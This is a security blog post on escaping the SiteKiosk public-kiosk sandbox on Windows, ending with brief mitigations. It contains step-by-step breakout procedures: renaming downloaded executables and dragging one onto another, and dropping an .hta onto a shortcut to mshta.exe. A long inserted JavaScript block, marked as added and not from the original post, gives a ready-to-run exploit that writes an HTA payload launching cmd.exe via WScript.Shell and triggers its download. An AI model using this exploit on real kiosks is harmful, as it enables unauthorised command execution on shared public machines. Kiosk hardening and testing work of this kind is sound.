SiteKiosk - Breakout

It has been a while since my last blog post, so I am going to share two possible bypasses for the software SiteKiosk on Windows. As the name suggests, it is kiosk software ^^.
SiteKiosk is a product of Provision GmbH. It claims more than 250,000 installations worldwide, which would make it one of the most widely used products in the "Public Access Terminal Software" category.
It has a lot of features, but my only goal was to break out of the sandbox and start an external application.
In the end my findings produced new BeEF modules.
Meet the enemy
Provision GmbH offers a trial version, which has nearly all features enabled. The only restriction is that it will sometimes annoy you with a 30-second timeout.
It uses IE as its rendering engine and supports Flash and PDF, so there is a lot to play with ;)
|SiteKiosk greeting message|
The Bypasses

Step one: Get a file on the file system
Step two: Execute it!
Getting a file on the system
After some tests it turned out that SiteKiosk is pretty good at blocking any dialogs which are triggered by changing the location. It also blocks all of the protocol handlers I tested, such as "its:" and "file:". Additionally, it checks iframes too and blocks any dialogs opened from them.
One function that still gets a save dialog through is window.navigator.msSaveOrOpenBlob.
The first parameter is a blob, which represents the data. The second parameter is the file name.
bb = new MSBlobBuilder();
Click Download and the first step is done.
Next step, find a place to save the file and execute it.
If you are lazy, you can trigger a download of a .hta file. HTA files are HTML applications, which are rendered by mshta.exe. Yes, by default it is not blocked. An HTA is an HTML file with all the power, which means it can instantiate any ActiveX object. Additionally, it does not matter where you save it, because it is interpreted by mshta.exe and not executed from the location it is saved in (in contrast to a .exe).
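The two pieces above put together, as an added example that is not code from the original post: the script builds an .hta payload in memory and hands it to the IE save dialog through navigator.msSaveOrOpenBlob. The HTA body, the file name and the command it runs (cmd.exe via WScript.Shell) are my assumptions; the post only states that a downloaded .hta is rendered by mshta.exe and can use any ActiveX object. The navigator object is passed in as a parameter so the code can be exercised outside IE; in the kiosk you would pass window.navigator.

```javascript
// Added example, not from the original post. Builds an .hta file in memory and
// triggers the IE save dialog with navigator.msSaveOrOpenBlob (the one dialog
// the post found SiteKiosk does not block). Command, file name and HTA markup
// are assumptions for illustration.

// Build the HTA source. When mshta.exe renders it, the inline script runs with
// full ActiveX access, so WScript.Shell.Run starts the program in `command`.
function buildHtaPayload(command) {
  // JSON.stringify yields a correctly quoted and escaped JS string literal.
  const quoted = JSON.stringify(command);
  return [
    '<html><head>',
    '<hta:application id="app" windowstate="minimize" showintaskbar="no" />',
    '<script language="javascript">',
    '  var sh = new ActiveXObject("WScript.Shell");',
    '  sh.Run(' + quoted + ');',
    '  window.close();',
    '</script>',
    '</head><body></body></html>'
  ].join('\r\n');
}

// Wrap the text in a Blob. IE10 shipped the prefixed MSBlobBuilder used in the
// post; IE11, modern browsers and Node 18+ have the standard Blob constructor
// (older Node keeps it in the 'buffer' module).
function makeBlob(text, mimeType) {
  if (typeof MSBlobBuilder !== 'undefined') {
    const bb = new MSBlobBuilder();
    bb.append(text);
    return bb.getBlob(mimeType);
  }
  const BlobCtor = typeof Blob !== 'undefined' ? Blob : require('buffer').Blob;
  return new BlobCtor([text], { type: mimeType });
}

// Trigger the save dialog. `nav` is the navigator object (window.navigator in
// the kiosk). Returns a small result object so the caller can see whether the
// dialog path was available at all.
function triggerDownload(nav, text, fileName) {
  if (!nav || typeof nav.msSaveOrOpenBlob !== 'function') {
    return { delivered: false, reason: 'msSaveOrOpenBlob not available (not IE10+)' };
  }
  const blob = makeBlob(text, 'application/hta');
  // First parameter: the blob holding the data. Second: the suggested file name.
  nav.msSaveOrOpenBlob(blob, fileName);
  return { delivered: true, fileName: fileName, size: blob.size };
}

// Usage inside the kiosk's IE engine (assumed command and file name):
//   triggerDownload(window.navigator, buildHtaPayload('cmd.exe'), 'notes.hta');
```

Once the user clicks "Save" or "Open" in the resulting dialog, step one is done; with an .hta, "Open" already hands the file to mshta.exe.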
Another problem is that you can't double-click in a download window, so you can't download a .exe, reopen the download window and double-click it. But there is a way around this problem too.
To execute a .exe via a Flash download, do the following:
- Trigger the download via Flash. Save the .exe in any location.
- Trigger the download again. Rename the previously downloaded .exe so that it will not be overwritten by the second download. You end up with two executables in the same location.
- Open the download window one last time. Instead of specifying a location to save to, drag the icon of one executable onto the other one. This starts the program, and the dragged file is passed as an argument. It is like dragging a file onto notepad.exe to open it.
The same drag-and-drop trick also works with a shortcut file, which lets you hand an .hta to mshta.exe:
- On your local PC, create a .lnk (a shortcut file) which points to "C:\windows\system32\mshta.exe". Trigger the download of this file via Flash.
- Trigger the download of your .hta script file. Save it in the same location as the previously downloaded file.
- Open the download window. Now drag your .hta script file onto the mshta.exe.lnk file. This passes the file to the real mshta.exe, which then executes it.
Mitigation

First, you need to block all script hosts such as mshta. This can be done with the System Security Assistant.
Second, you need to lock down all locations where it is possible to store and execute files. An example is C:\users\public\downloads.